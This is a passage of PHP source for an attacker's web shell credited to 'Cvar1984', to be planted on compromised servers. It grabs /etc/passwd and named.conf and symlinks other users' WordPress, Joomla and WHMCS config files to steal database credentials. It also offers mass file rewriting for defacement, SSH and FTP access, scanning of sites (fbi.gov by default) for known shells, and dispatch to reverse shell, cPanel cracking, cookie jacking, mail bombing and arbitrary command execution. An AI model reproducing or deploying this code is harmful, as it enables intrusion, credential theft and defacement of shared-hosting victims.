2269. ?><script>alert("/etc/named.conf Not Found, Its
2270. alternative method.");</script><div
2271. id=result><center><h2>Config Grabber</h2><hr><br><br><table class=tbl><form
2272. method=POST><tr><td><textarea spellcheck=false
2273. class='textarea_edit' rows=15 cols=60 name=user_z_list><?php
2274. $users = file('/etc/passwd');
2275. foreach($users as $user) {
2276. $user = explode(':', $user);
2277. echo $user[0] . "\n";
2278. }
2279. ?></textarea></td></tr><tr><td><input
2280. type='submit' class='input_big' value='O'/></td></tr></form></table><br /><br
2281. /><hr /><br /><br /><hr /></div><?php
2282. } else {
2283. alert(" File Not Found : /etc/passwd ");
2284. }
2285. }
2286. function symlinggg($user) {
2287. symlink('/home/' . $usernamexx . '/public_html/blog/configuration.php', "Cvar1984/" . $user . " =>blog/configuration.php");
2288. symlink('/home/' . $user . '/public_html/forum/includes/config.php', "Cvar1984/" . $user . " =>forum/includes/config.php");
2289. symlink("/home/" . $user . "/public_html/wp-config.php", "Cvar1984/" . $user . " =>wp-config.php");
2290. symlink("/home/" . $user . "/public_html/wordpress/wp-config.php", "Cvar1984/" . $user . " =>wordpress/wp-config.php");
2291. symlink("/home/" . $user . "/public_html/configuration.php", "Cvar1984/" . $user . " =>configuration.php");
2292. symlink("/home/" . $user . "/public_html/blog/wp-config.php", "Cvar1984/" . $user . " =>blog/wp-config.php");
2293. symlink("/home/" . $user . "/public_html/joomla/configuration.php", "Cvar1984/" . $user . " =>joomla/configuration.php");
2294. symlink("/home/" . $user . "/public_html/vb/includes/config.php", "Cvar1984/" . $user . " =>vb/includes/config.php");
2295. symlink("/home/" . $user . "/public_html/includes/config.php", "Cvar1984/" . $user . " =>includes/config.php");
2296. symlink("/home/" . $user . "/public_html/conf_global.php", "Cvar1984/" . $user . " =>conf_global.php");
2297. symlink("/home/" . $user . "/public_html/inc/config.php", "Cvar1984/" . $user . " =>inc/config.php");
2298. symlink("/home/" . $user . "/public_html/config.php", "Cvar1984/" . $user . " =>config.php");
2299. symlink("/home/" . $user . "/public_html/Settings.php", "Cvar1984/" . $user . " =>/Settings.php");
2300. symlink("/home/" . $user . "/public_html/sites/default/settings.php", "Cvar1984/" . $user . " =>sites/default/settings.php");
2301. symlink("/home/" . $user . "/public_html/whm/configuration.php", "Cvar1984/" . $user . " =>whm/configuration.php");
2302. symlink("/home/" . $user . "/public_html/whmcs/configuration.php", "Cvar1984/" . $user . " =>whmcs/configuration.php");
2303. symlink("/home/" . $user . "/public_html/support/configuration.php", "Cvar1984/" . $user . " =>support/configuration.php");
2304. symlink("/home/" . $user . "/public_html/whmc/WHM/configuration.php", "Cvar1984/" . $user . " =>whmc/WHM/configuration.php");
2305. symlink("/home/" . $user . "/public_html/whm/WHMCS/configuration.php", "Cvar1984/" . $user . "
2306. =>whm/WHMCS/configuration.php");
2307. symlink("/home/" . $user . "/public_html/whm/whmcs/configuration.php", "Cvar1984/" . $user . "
2308. =>whm/whmcs/configuration.php");
2309. symlink("/home/" . $user . "/public_html/support/configuration.php", "Cvar1984/" . $user . " =>support/configuration.php");
2310. symlink("/home/" . $user . "/public_html/clients/configuration.php", "Cvar1984/" . $user . " =>clients/configuration.php");
2311. symlink("/home/" . $user . "/public_html/client/configuration.php", "Cvar1984/" . $user . " =>client/configuration.php");
2312. symlink("/home/" . $user . "/public_html/clientes/configuration.php", "Cvar1984/" . $user . " =>clientes/configuration.php");
2313. symlink("/home/" . $user . "/public_html/cliente/configuration.php", "Cvar1984/" . $user . " =>cliente/configuration.php");
2314. symlink("/home/" . $user . "/public_html/clientsupport/configuration.php", "Cvar1984/" . $user . "
2315. =>clientsupport/configuration.php");
2316. symlink("/home/" . $user . "/public_html/billing/configuration.php", "Cvar1984/" . $user . " =>billing/configuration.php");
2317. symlink("/home/" . $user . "/public_html/admin/config.php", "Cvar1984/" . $user . " =>admin/config.php");
2318. }
2319. function sym_xxx() {
2320. global $sym_htaccess, $sym_php_ini;
2321. mkdir('Cvar1984', 0777);
2322. symlink("/", "Cvar1984/root");
2323. $htaccess = @fopen('Cvar1984/.htaccess', 'w');
2324. fwrite($htaccess, $sym_htaccess);
2325. $php_ini_x = fopen('Cvar1984/php.ini', 'w');
2326. fwrite($php_ini_x, $sym_php_ini);
2327. $akps = implode(file("/etc/named.conf"));
2328. if(!$akps) {
2329. config_grabber_ui();
2330. } else {
2331. $usrd = array();
2332. foreach($akps as $akp) {
2333. if(eregi("zone", $akp)) {
2334. preg_match_all('#zone "(.*)" #', $akp, $akpzz);
2335. flush();
2336. if(strlen(trim($akpzz[1][0])) > 2) {
2337. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $akpzz[1][0]));
2338. symlinkg($akpzz[1][0], $user['name']);
2339. flush();
2340. }
2341. }
2342. }
2343. }
2344. }
2345. function sym_link() {
2346. global $sym_htaccess, $sym_php_ini;
2347. cmd('rm -rf CVAR');
2348. mkdir('CVAR', 0755);
2349. $usrd = array();
2350. $akps = implode(file("/etc/named.conf"));
2351. $htaccess = fopen('CVAR/.htaccess', 'w');
2352. fwrite($htaccess, $sym_htaccess);
2353. $php_ini_x = fopen('CVAR/php.ini', 'w');
2354. fwrite($php_ini_x, $sym_php_ini);
2355. symlink("/", "CVAR/root");
2356. if(!$file) {
2357. echo "<script>alert('Bind File /etc/passwd Not Found.
2358. Its alternative Method')</script>";
2359. echo "<div
2360. id=result><center><h2>SymLink</h2></center><hr
2361. /><br /><br /><table
2362. class='table'><tr><th>Users</th><th>Exploit</th></tr>";
2363. $users = file('/etc/passwd');
2364. foreach($users as $user) {
2365. $user = explode(':', $user);
2366. echo "<tr><td>" . $user[0] . "</td><td><a
2367. href='CVAR/root/home/" . $user[0] . "/public_html/'
2368. target=_blank>SymLink</tr>";
2369. }
2370. echo "</table><br><br><hr><br><br></div>";
2371. } else {
2372. echo "<table
2373. class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
2374. foreach($akps as $akp) {
2375. if(eregi("zone", $akp)) {
2376. preg_match_all('#zone "(.*)" #', $akp, $akpzz);
2377. flush();
2378. if(strlen(trim($akpzz[1][0])) > 2) {
2379. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $akpzz[1][0]));
2380. echo "<tr><td><a
2381. href=http://www." . $akpzz[1][0] . "
2382. target=_blank>" . $akpzz[1][0] . "</a><td>" . $user['name'] . "</td><td><a
2383. href='CVAR/root/home/" . $user['name'] . "/public_html/'
2384. target=_blank>SymLink</a></td></tr></table>";
2385. flush();
2386. }
2387. }
2388. }
2389. }
2390. }
2391. function shell_finder_ui() {
2392. echo "<div id=result><center><h2>SH3LL
2393. SCANNER</h2><hr /><br /><br /><br /><form
2394. method='GET'>URL : <input size=50 name='sh311_scanx'
2395. value='http://www.fbi.gov/php/'><input type='submit'
2396. value='O' /></form><br /><br /><hr
2397. /><br /><br />";
2398. }
2399. function shell_finder_bg() {
2400. $sh_url = $_GET['sh311_scanx'];
2401. echo "
2402. <div id=result><center><h2>SHELL
2403. SCAN</h2><hr /><br /><br /><table
2404. class='table'>";
2405. $ShellZ = array(
2406. "x.jpg.php",
2407. "indoXploit.php",
2408. "x.php",
2409. "ini.php",
2410. "c99.php",
2411. "c100.php",
2412. "r57.php",
2413. "b374k.php",
2414. "c22.php",
2415. "sym.php",
2416. "adminer.php",
2417. "r00t.php",
2418. "webr00t.php",
2419. "sql.php",
2420. "cpanel.php",
2421. "wso.php",
2422. "404.php",
2423. "aarya.php",
2424. "yellowshell.php",
2425. "ddos.php",
2426. "madspot.php",
2427. "1337.php",
2428. "31337.php",
2429. "WSO.php",
2430. "dz.php",
2431. "cpn.php",
2432. "sh3ll.php",
2433. "mysql.php",
2434. "killer.php",
2435. "cgishell.pl",
2436. "dz0.php",
2437. "whcms.php",
2438. "vb.php",
2439. "gaza.php",
2440. "d0mains.php",
2441. "changeall.php",
2442. "h4x0r.php",
2443. "L3b.php",
2444. "uploads.php",
2445. "shell.asp",
2446. "cmd.asp",
2447. "sh3ll.asp",
2448. "b374k-2.2.php",
2449. "m1n1.php",
2450. "b374km1n1.php"
2451. );
2452. foreach($ShellZ as $shell) {
2453. $urlzzx = $sh_url . $shell;
2454. if(function_exists('curl_init')) {
2455. echo "<tr><td
2456. style='text-align:left'><font
2457. color=orange>Checking : </font> <font color=7171C6> $urlzzx
2458. </font></td>";
2459. $ch = curl_init($urlzzx);
2460. curl_setopt($ch, CURLOPT_NOBODY, true);
2461. curl_exec($ch);
2462. $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
2463. curl_close($ch);
2464. if($status_code == 200) {
2465. echo "<td style='text-align:left'><font
2466. color=yellow>Found</font></td></tr>";
2467. } else {
2468. echo "<td style='text-align:left'><font
2469. color=red>Not Found...</font></td></tr>";
2470. }
2471. } else {
2472. echo "<font color=red>cURL Not Found </font>";
2473. break;
2474. }
2475. }
2476. echo "</table><br><br><hr><br><br></div>";
2477. }
2478. function code_in_ui() {
2479. global $sep;
2480. $mode = $_POST['modexxx'];
2481. $ftype = $_POST['ffttype'];
2482. $c_cont = $_POST['code_cont'];
2483. $ppp = $_POST['path'];
2484. if(isset($_POST['modexxx']) && isset($_POST['path']) && isset($_POST['ffttype']) && isset($_POST['code_cont']) && $mode != "" && $ftype != "" && $c_cont != "" && $ppp != "") {
2485. echo "<div id=result><center><h2>Mass Rewrite Successfully</h2></center><table class=tbl>";
2486. switch($mode) {
2487. case "Apender":
2488. $mmode = "a";
2489. break;
2490. case "Rewrite":
2491. $mmode = "w";
2492. break;
2493. }
2494. if($handle = opendir($ppp)) {
2495. while(($c_file = readdir($handle)) !== False) {
2496. if((preg_match("/$ftype" . '$' . '/', $c_file, $matches) != 0) && (preg_match('/' . $c_file . '$/', $self, $matches) != 1)) {
2497. echo "<tr><td><font
2498. color=red>$ppp$sep$c_file</font></td></tr>";
2499. $fd = fopen($ppp . $sep . $c_file, $mmode);
2500. if($fd) {
2501. fwrite($fd, $c_cont);
2502. } else {
2503. alert("Error. Access Denied");
2504. }
2505. }
2506. }
2507. }
2508. echo "</table><br><br><hr><br><br></div>";
2509. } else {
2510. ?>
2511. <div id=result><center><h2>Mass Rewrite</h2></center><hr><br><br><table class=table><form method='POST'><input type='hidden' name='path' value="<?php
2512. echo getcwd();
2513. ?>"><tr><td>Mode : </td>
2514. <td><select style='color:yellow; background-color:black;
2515. border:1px solid #666;'
2516. name='modexxx'><option>Rewrite</option><option>Apender</option></select></td></tr><tr><td>File
2517. Type</td><td><input name='ffttype' value='html'
2518. size=50></td></tr>
2519. <tr><td>Content : </td><td><textarea
2520. name='code_cont' rows=20 cols=60
2521. class='textarea_edit'></textarea></td></tr><tr><td></td><td><input
2522. type=submit value='O' class='input_big' /></td></tr></form></table><br><br><hr><br><br>
2523. <?php
2524. }
2525. }
2526. function ssh_man_ui() {
2527. ?>
2528. <div id=result><center><h2>SSH
2529. Manager</h2><hr /><br /><br /><table
2530. class=table><form method='GET'><tr><td>HOST :
2531. </td><td><input size=50
2532. name='ssh_host'></td></tr><tr><td>Username :
2533. </td><td><input size=50
2534. name='ssh_user'></td></tr><tr><td>Password :
2535. </td><td><input size=50
2536. name='ssh_pass'></td></tr><tr><td></td><td><input
2537. type='submit' value='O' /></form></table></center><br><br><hr><br><br></div>
2538. <?php
2539. }
2540. function ssh_man_bg() {
2541. $ssh_h = $_GET['ssh_host'];
2542. $ssh_u = $_GET['ssh_user'];
2543. $ssh_p = $_GET['ssh_pass'];
2544. if(!function_exists('ssh2_connect')) {
2545. alert("Sorry, Function ssh2_connect is not found");
2546. }
2547. $conn = ssh2_connect($ssh_h, 22);
2548. if(!$conn) {
2549. alert("SSH Host Not Found");
2550. }
2551. $log = ssh2_auth_password($conn, $ssh_u, $ssh_p);
2552. if(!$log) {
2553. alert("SSH Authorication failed");
2554. }
2555. $shell = ssh2_shell($conn, "bash");
2556. if($_GET['ssh_cmd'] != "" && $_GET['ssh_cmd']) {
2557. $ssh_cmd = $_GET['ssh_cmd'];
2558. fwrite($shell, $ssh_cmd);
2559. sleep(1);
2560. while($line = fgets($shell)) {
2561. flush();
2562. echo $line . "\n";
2563. }
2564. ?>
2565. <div id=result><center><h2>SSH Shell by Cvar1984
2566. Shell</h2><hr /><br /><br /><textarea
2567. class='textarea_edit' rows=20 cols=60></textarea>
2568. <form method='GET'>CMD : <input name='ssh_cmd'
2569. size=60><input type='submit' value='O' /></form></center><br><br><hr><br><br></div>
2570. <?php
2571. } else {
2572. ?>
2573. <div id=result><center><h2>SSH Shell by Cvar1984
2574. Shell</h2><hr /><br /><br /><textarea
2575. class='textarea_edit' rows=20 cols=60></textarea>
2576. <form method='GET'>CMD : <input name='ssh_cmd'
2577. size=60><input type='submit' value='O' /></form></center><br><br><hr><br><br></div>
2578. <?php
2579. }
2580. }
2581. function ftp_man_ui() {
2582. ?>
2583. <div id=result><center><h2>FTP
2584. Manager</h2><hr /><br /><br /><table
2585. class=table><form method='GET'><tr><td>HOST :
2586. </td><td><input size=50
2587. name='ftp_host'></td></tr>
2588. <tr><td>Username : </td><td><input size=50
2589. name='ftp_user'></td></tr>
2590. <tr><td>Password : </td><td><input size=50
2591. name='ftp_pass'></td></tr>
2592. <tr><td>Path [<font color=red>Optional</font>]
2593. : </td><td><input name='fpath'
2594. size=50></td></tr>
2595. <tr><td>Upload File From Server [<font
2596. color=red>Optional</font>] : </td><td><input
2597. name='upload_file' size=50></td></tr>
2598. <tr><td>Download File To Server [<font
2599. color=red>Optional</font>] : </td><td><input
2600. name='download_file' size=50></td></tr>
2601. <tr><td></td><td><input type='submit'
2602. value='O'
2603. /></form></table></center><br /><br
2604. /><hr /><br /><br /></div>
2605. <?php
2606. }
2607. function ftp_man_bg() {
2608. echo "<div id=result><center><h2>FTP FILEMANAGER</h2></center><hr />";
2609. $fhost = $_GET['ftp_host'];
2610. $fuser = $_GET['ftp_user'];
2611. $fpass = $_GET['ftp_pass'];
2612. $fpath = $_GET['fpath'];
2613. $upl = $_GET['upload_file'];
2614. $down = $_GET['download_file'];
2615. if($fpath == "") {
2616. $fpath = ftp_pwd($conn);
2617. }
2618. $conn = ftp_connect($fhost);
2619. if(!$conn) {
2620. alert("FTP Host Not Found!!!");
2621. }
2622. $log = ftp_login($conn, $fuser, $fpass);
2623. if(!$log) {
2624. alert("FTP Authorication Failed");
2625. }
2626. if($upl != "") {
2627. $fp = fopen($upl, 'r');
2628. if(ftp_fput($conn, $upl, $fp, FTP_ASCII)) {
2629. echo "<center><font color=yellow>Successfully uploaded <font color=red> $upl </font> </font></center>";
2630. } else {
2631. echo "<center><font color=red>There was a problem while uploading <font color=yellow> $upl </font></font></center>";
2632. }
2633. }
2634. if($down != "") {
2635. $handle = fopen($down, 'w');
2636. if(ftp_fget($conn, $handle, $down, FTP_ASCII, 0)) {
2637. echo "<center><font color=yellow>successfully written to <font color=red> $down </font></font></center>";
2638. } else {
2639. echo "<center><font color=red>There was a problem while downloading <font color=yellow> $down </font> to <font color=yellow> $down </font></font></center>";
2640. }
2641. }
2642. echo "<table class='table'><tr><th>Files</th>";
2643. ftp_chdir($fpath);
2644. $list = ftp_rawlist($conn, $fpath);
2645. foreach($list as $fff) {
2646. echo "<tr><td><pre>$fff</pre></td></tr>";
2647. }
2648. echo "</table></div>";
2649. }
2650. // Frond End Calls //
2651. if(isset($_POST['e_file']) && isset($_POST['e_content_n'])) {
2652. edit_file_bg();
2653. } else if(isset($_REQUEST['musik'])) {
2654. soundcloud();
2655. } else if(isset($_REQUEST['logger'])) {
2656. ceklog();
2657. } else if(isset($_REQUEST['ganteng'])) {
2658. gantengware();
2659. } else if(isset($_REQUEST['phpinfo'])) {
2660. phpinfo();
2661. } else if(isset($_REQUEST['rctm'])) {
2662. rctm();
2663. } else if(isset($_REQUEST['idx'])) {
2664. idxshell();
2665. } else if(isset($_REQUEST['xaishell'])) {
2666. xaishell();
2667. } else if(isset($_REQUSET['ngindex'])) {
2668. ngindex();
2669. } else if(isset($_REQUEST['jembud2'])) {
2670. jembud2();
2671. } else if(isset($_REQUEST['cgi'])) {
2672. cgi();
2673. } else if(isset($_REQUEST['adminer'])) {
2674. adminer();
2675. } else if(isset($_REQUEST['sh311_scanner'])) {
2676. shell_finder_ui();
2677. } else if(isset($_REQUEST['ftp_host']) && isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass'])) {
2678. ftp_man_bg();
2679. } else if(isset($_REQUEST['ftpman'])) {
2680. ftp_man_ui();
2681. } else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user']) && isset($_GET['ssh_pass'])) {
2682. ssh_man_bg();
2683. } else if(isset($_REQUEST['sshman'])) {
2684. ssh_man_ui();
2685. } else if(isset($_REQUEST['c0de_inject']) && isset($_REQUEST['path'])) {
2686. chdir($_GET['path']);
2687. code_in_ui();
2688. } else if(isset($_GET['sh311_scanx'])) {
2689. shell_finder_bg();
2690. } else if(isset($_REQUEST['config_grab'])) {
2691. sym_xxx();
2692. } else if(isset($_REQUEST['ftp_man'])) {
2693. ftp_man_ui();
2694. } else if(isset($_REQUEST['mass_xploit'])) {
2695. mass_deface_ui();
2696. } else if(isset($_GET['f_host']) && isset($_GET['f_user']) && isset($_GET['f_pass'])) {
2697. ftp_man_bg();
2698. } else if(isset($_GET['mass_name']) && isset($_GET['mass_cont'])) {
2699. mass_deface_bg();
2700. } else if(isset($_REQUEST['ftp_anon_scan'])) {
2701. ftp_anonymous_ui();
2702. } else if(isset($_GET['ftp_anonz'])) {
2703. ftp_anonymous_bg();
2704. } else if(isset($_REQUEST['killme'])) {
2705. killme();
2706. } else if(isset($_REQUEST['hexenc'])) {
2707. hex_encode_ui();
2708. } else if(isset($_REQUEST['remotefiledown'])) {
2709. remote_download_ui();
2710. } else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path'])) {
2711. remote_download_bg();
2712. } else if(isset($_REQUEST['cpanel_crack'])) {
2713. cpanel_crack();
2714. } else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz'])) {
2715. remote_file_check_bg();
2716. } else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content'])) {
2717. php_ende_bg();
2718. } else if(isset($_REQUEST['remote_server_scan'])) {
2719. remote_file_check_ui();
2720. } else if(isset($_REQUEST['server_exploit_details'])) {
2721. exploit_details();
2722. } else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content'])) {
2723. massmailer_bg();
2724. } else if(isset($_REQUEST['mysqlman'])) {
2725. mysqlman();
2726. } else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content'])) {
2727. mailbomb_bg();
2728. } else if(isset($_REQUEST['cookiejack'])) {
2729. cookie_jack();
2730. } else if(isset($_REQUEST['massmailer'])) {
2731. massmailer_ui();
2732. } else if(isset($_REQUEST['rename'])) {
2733. chdir($_GET['path']);
2734. rename_ui();
2735. } else if(isset($_GET['old_name']) && isset($_GET['new_name'])) {
2736. chdir($_GET['path']);
2737. rename_bg();
2738. } else if(isset($_REQUEST['encodefile'])) {
2739. php_ende_ui();
2740. } else if(isset($_REQUEST['edit'])) {
2741. edit_file();
2742. } else if(isset($_REQUEST['down']) && isset($_REQUEST['path'])) {
2743. download();
2744. } else if(isset($_REQUEST['gzip']) && isset($_REQUEST['path'])) {
2745. download_gzip();
2746. } else if(isset($_REQUEST['read'])) {
2747. chdir($_GET['path']);
2748. code_viewer();
2749. } else if(isset($_REQUEST['perm'])) {
2750. chdir($_GET['path']);
2751. ch_perm_ui();
2752. } else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm'])) {
2753. chdir($_GET['path']);
2754. ch_perm_bg();
2755. } else if(isset($_REQUEST['del_fil'])) {
2756. chdir($_GET['path']);
2757. delete_file();
2758. exit;
2759. } else if(isset($_REQUEST['phpinfo'])) {
2760. chdir($_GET['path']);
2761. ob_clean();
2762. echo phpinfo();
2763. exit;
2764. } else if(isset($_REQUEST['del_dir'])) {
2765. chdir($_GET['path']);
2766. $d_dir = $_GET['del_dir'];
2767. deldirs($d_dir);
2768. } else if(isset($_GET['path']) && isset($_GET['new_file'])) {
2769. chdir($_GET['path']);
2770. mk_file_ui();
2771. } else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content'])) {
2772. mk_file_bg();
2773. } else if(isset($_GET['path']) && isset($_GET['new_dir'])) {
2774. chdir($_GET['path']);
2775. create_dir();
2776. } else if(isset($_GET['path']) && isset($_GET['cmdexe'])) {
2777. chdir($_GET['path']);
2778. cmd();
2779. } else if(isset($_POST['upload_f']) && isset($_POST['path'])) {
2780. upload_file();
2781. } else if(isset($_REQUEST['rs'])) {
2782. reverse_conn_ui();
2783. } else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port'])) {
2784. reverse_conn_bg();
2785. } else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path'])) {
2786. chdir($_GET['path']);
2787. safe_mode_fuck_ui();
2788. } else if(isset($_GET['path']) && isset($_GET['safe_mode'])) {
2789. safe_mode_fuck();
2790. } else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir'])) {
2791. AccessDenied();
2792. } else if(isset($_REQUEST['symlink'])) {
2793. sym_link();
2794. } else if(isset($_GET['path']) && isset($_GET['copy'])) {
2795. copy_file_ui();
2796. } else if(isset($_GET['c_file']) && isset($_GET['c_target']) && isset($_GET['cn_name'])) {
2797. copy_file_bg();
2798. } else {
2799. filemanager_bg();
2800. }
2801. echo "</div>
2802. <div id=result>
2803. <center><p>
2804. <table class='tbl'><tr><td>
2805. <form method='GET'>PWD :
2806. <input size='50' name='path' value='" . getcwd() . "'>
2807. <input type='submit' value='O'></form></td></tr></table>
2808. <table class='tbl'><tr>
2809. <td><form style='float:right;' method='GET'>
2810. <input name='path' value='" . getcwd() . "' type=hidden><span> New File : </span>
2811. <input type='submit' value='O'>
2812. <input size='40' name='new_file'></form>
2813. </td>
2814. <td><form style='float:left;' method='GET'>
2815. <input name='path' value='" . getcwd() . "' type=hidden>
2816. <input size='40' name='new_dir'>
2817. <input type='submit' value='O'>
2818. <span> : New Dir</span></form>
2819. </td>
2820. </tr>
2821. <tr>
2822. <td><form style='float:right;' method='GET'>
2823. <input style='float:left;' name='path' value='" . getcwd() . "' type=hidden>
2824. <span>CMD : </span>
2825. <input type='submit' value='O'>
2826. <input name='cmdexe' size='40'></form>
2827. </td>
2828. <td><form style='float:left;' method='POST' enctype=\"multipart/form-data\">
2829. <input name='path' value='" . getcwd() . "' type=hidden>
2830. <input size='27' name='upload_f' type='file'>
2831. <input type='submit' name='upload_f' value='O'>
2832. <span> : Upload File</span></form>
2833. </td>
2834. </tr>
2835. </table></p>
2836. <font size=4 color=yellow>
2837. <a style='color:yellow;text-decoration:none;' href=https://Cvar1984.Sarahah.com>Feedback</a></center>Date : $date</font></div>";
2838. ?>